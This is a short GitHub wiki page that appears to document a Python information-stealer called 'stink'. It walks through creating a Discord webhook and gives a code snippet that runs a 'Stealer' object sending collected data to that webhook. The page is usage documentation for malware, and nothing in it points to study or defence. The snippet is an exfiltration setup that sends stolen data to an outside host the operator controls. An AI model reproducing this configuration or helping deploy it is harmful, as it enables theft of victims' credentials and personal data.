-
Notifications
You must be signed in to change notification settings - Fork 55
Discord hook
Astaroth edited this page Aug 3, 2023
·
7 revisions
A guide on how to set up data sending via the Discord hook.
- Open the server in which the data should be sent.
- Open the server settings by clicking its name:
- Select
Integration
in the menu that appears.
- Click the
Create Webhook
button:
- Copy your webhook:
from stink import Stealer, Senders
if __name__ == '__main__':
Stealer(senders=[Senders.discord(webhook="YOUR_WEBHOOK")]).run()